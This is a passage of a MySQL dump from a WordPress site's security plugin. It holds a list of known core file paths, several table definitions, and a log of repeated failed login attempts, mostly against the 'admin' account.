/wp-includes/random_compat/cast_to_int.php'),(4060,'wp-includes/wp-includes/random_compat/error_polyfill.php'),(4061,'wp-includes/wp-includes/random_compat/random.php'),(4062,'wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php'),(4063,'wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php'),(4064,'wp-includes/wp-includes/random_compat/random_bytes_libsodium.php'),(4065,'wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(4066,'wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php'),(4067,'wp-includes/wp-includes/random_compat/random_int.php'),(4068,'wp-includes/wp-includes/registration-functions.php'),(4069,'wp-includes/wp-includes/registration.php'),(4070,'wp-includes/wp-includes/rest-api/class-wp-rest-request.php'),(4071,'wp-includes/wp-includes/rest-api/class-wp-rest-response.php'),(4072,'wp-includes/wp-includes/rest-api/class-wp-rest-server.php'),(4073,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(4074,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(4075,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(4076,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(4077,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(4078,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(4079,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(4080,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(4081,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(4082,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(4083,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(4084,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(4085,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(4086,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(4087,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(4088,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(4089,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(4090,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(4091,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(4092,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(4093,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(4094,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(4095,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(4096,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(4097,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(4098,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(4099,'wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(4100,'wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(4101,'wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(4102,'wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(4103,'wp-includes/wp-includes/rest-api.php'),(4104,'wp-includes/wp-includes/revision.php'),(4105,'wp-includes/wp-includes/rewrite.php'),(4106,'wp-includes/wp-includes/robots-template.php'),(4107,'wp-includes/wp-includes/rss-functions.php'),(4108,'wp-includes/wp-includes/rss.php'),(4109,'wp-includes/wp-includes/script-loader.php'),(4110,'wp-includes/wp-includes/session.php'),(4111,'wp-includes/wp-includes/shortcodes.php'),(4112,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php'),(4113,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(4114,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(4115,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(4116,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(4117,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php'),(4118,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(4119,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(4120,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(4121,'wp-includes/wp-includes/sitemaps.php'),(4122,'wp-includes/wp-includes/sodium_compat/LICENSE'),(4123,'wp-includes/wp-includes/sodium_compat/autoload-php7.php'),(4124,'wp-includes/wp-includes/sodium_compat/autoload.php'),(4125,'wp-includes/wp-includes/sodium_compat/composer.json'),(4126,'wp-includes/wp-includes/sodium_compat/lib/constants.php'),(4127,'wp-includes/wp-includes/sodium_compat/lib/namespaced.php'),(4128,'wp-includes/wp-includes/sodium_compat/lib/php72compat.php'),(4129,'wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php'),(4130,'wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php'),(4131,'wp-includes/wp-includes/sodium_compat/namespaced/Compat.php'),(4132,'wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(4133,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(4134,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(4135,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(4136,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(4137,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(4138,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(4139,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(4140,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(4141,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(4142,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(4143,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(4144,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(4145,'wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(4146,'wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(4147,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(4148,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(4149,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(4150,'wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(4151,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php'),(4152,'wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php'),(4153,'wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(4154,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(4155,'wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php'),(4156,'wp-includes/wp-includes/sodium_compat/namespaced/File.php'),(4157,'wp-includes/wp-includes/sodium_compat/src/Compat.php'),(4158,'wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(4159,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php'),(4160,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php'),(4161,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(4162,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(4163,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(4164,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php'),(4165,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(4166,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(4167,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(4168,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(4169,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(4170,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(4171,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(4172,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(4173,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php'),(4174,'wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php'),(4175,'wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php'),(4176,'wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php'),(4177,'wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(4178,'wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php'),(4179,'wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php'),(4180,'wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(4181,'wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php'),(4182,'wp-includes/wp-includes/sodium_compat/src/Core/Util.php'),(4183,'wp-includes/wp-includes/sodium_compat/src/Core/X25519.php'),(4184,'wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php'),(4185,'wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php'),(4186,'wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(4187,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(4188,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(4189,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(4190,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(4191,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(4192,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(4193,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(4194,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(4195,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(4196,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(4197,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(4198,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php'),(4199,'wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php'),(4200,'wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(4201,'wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(4202,'wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php'),(4203,'wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php'),(4204,'wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(4205,'wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php'),(4206,'wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php'),(4207,'wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(4208,'wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php'),(4209,'wp-includes/wp-includes/sodium_compat/src/Core32/Util.php'),(4210,'wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php'),(4211,'wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(4212,'wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(4213,'wp-includes/wp-includes/sodium_compat/src/Crypto.php'),(4214,'wp-includes/wp-includes/sodium_compat/src/Crypto32.php'),(4215,'wp-includes/wp-includes/sodium_compat/src/File.php'),(4216,'wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(4217,'wp-includes/wp-includes/sodium_compat/src/SodiumException.php'),(4218,'wp-includes/wp-includes/spl-autoload-compat.php'),(4219,'wp-includes/wp-includes/taxonomy.php'),(4220,'wp-includes/wp-includes/template-loader.php'),(4221,'wp-includes/wp-includes/template.php'),(4222,'wp-includes/wp-includes/theme-compat/comments.php'),(4223,'wp-includes/wp-includes/theme-compat/embed-404.php'),(4224,'wp-includes/wp-includes/theme-compat/embed-content.php'),(4225,'wp-includes/wp-includes/theme-compat/embed.php'),(4226,'wp-includes/wp-includes/theme-compat/footer-embed.php'),(4227,'wp-includes/wp-includes/theme-compat/footer.php'),(4228,'wp-includes/wp-includes/theme-compat/header-embed.php'),(4229,'wp-includes/wp-includes/theme-compat/header.php'),(4230,'wp-includes/wp-includes/theme-compat/sidebar.php'),(4231,'wp-includes/wp-includes/theme.php'),(4232,'wp-includes/wp-includes/update.php'),(4233,'wp-includes/wp-includes/user.php'),(4234,'wp-includes/wp-includes/vars.php'),(4235,'wp-includes/wp-includes/version.php'),(4236,'wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php'),(4237,'wp-includes/wp-includes/widgets/class-wp-widget-archives.php'),(4238,'wp-includes/wp-includes/widgets/class-wp-widget-calendar.php'),(4239,'wp-includes/wp-includes/widgets/class-wp-widget-categories.php'),(4240,'wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php'),(4241,'wp-includes/wp-includes/widgets/class-wp-widget-links.php'),(4242,'wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php'),(4243,'wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php'),(4244,'wp-includes/wp-includes/widgets/class-wp-widget-media-image.php'),(4245,'wp-includes/wp-includes/widgets/class-wp-widget-media-video.php'),(4246,'wp-includes/wp-includes/widgets/class-wp-widget-media.php'),(4247,'wp-includes/wp-includes/widgets/class-wp-widget-meta.php'),(4248,'wp-includes/wp-includes/widgets/class-wp-widget-pages.php'),(4249,'wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php'),(4250,'wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php'),(4251,'wp-includes/wp-includes/widgets/class-wp-widget-rss.php'),(4252,'wp-includes/wp-includes/widgets/class-wp-widget-search.php'),(4253,'wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php'),(4254,'wp-includes/wp-includes/widgets/class-wp-widget-text.php'),(4255,'wp-includes/wp-includes/widgets.php'),(4256,'wp-includes/wp-includes/wlwmanifest.xml'),(4257,'wp-includes/wp-includes/wp-db.php'),(4258,'wp-includes/wp-includes/wp-diff.php'),(4259,'wp-links-opml.php'),(4260,'wp-load.php'),(4261,'wp-login.php'),(4262,'wp-mail.php'),(4263,'wp-settings.php'),(4264,'wp-signup.php'),(4265,'wp-trackback.php'),(4266,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflivetraffichuman`
--

LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflocs`
--

DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflocs`
--

LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflogins`
--

DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=6030 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflogins`
--

LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (4030,7046,1628914669.527640,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4031,7047,1628914683.442499,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4032,7049,1628915010.307966,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4033,7050,1628915334.841786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4034,7051,1628915500.091699,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4035,7054,1628916294.736366,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4036,7055,1628916623.154437,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j5s}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4037,7056,1628916945.279176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4038,7057,1628917261.018001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4039,7058,1628917319.243551,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4040,7059,1628917566.835432,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4041,7060,1628917884.070802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4042,7061,1628918019.046022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4043,7062,1628918201.435592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4044,7063,1628918518.856639,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4045,7064,1628918836.914057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4046,7065,1628919154.324075,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4047,7066,1628919274.797495,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����o','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(4048,7068,1628919816.444253,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4049,7069,1628919830.356372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(4050,7070,1628920106.255337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4051,7071,1628920451.686290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4052,7072,1628920541.598961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y�g','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4053,7073,1628920745.367471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���vSF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4054,7075,1628921093.333549,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��l�*r','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(4055,7076,1628921151.583211,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0�����\\','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4056,7078,1628921729.858079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4057,7079,1628921799.862389,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4058,7080,1628922018.955957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4059,7081,1628922516.229846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4060,7082,1628923058.179101,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h��.','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(4061,7085,1628923618.588205,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4062,7086,1628923822.481303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4063,7087,1628924148.703761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M\'f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4064,7088,1628924333.928921,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#t;','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(4065,7089,1628924452.050029,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4066,7090,1628924799.668427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4067,7091,1628924895.234584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4068,7092,1628925088.850050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4069,7093,1628925411.276786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��o�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4070,7094,1628925601.009763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"P�R','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4071,7095,1628925739.738809,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4072,7096,1628926050.612461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4073,7098,1628926402.520973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4074,7098,1628926402.556168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4075,7099,1628926700.003035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4076,7100,1628926863.426972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�\Z','Mozilla/5.0 (Windows NT 6.1) 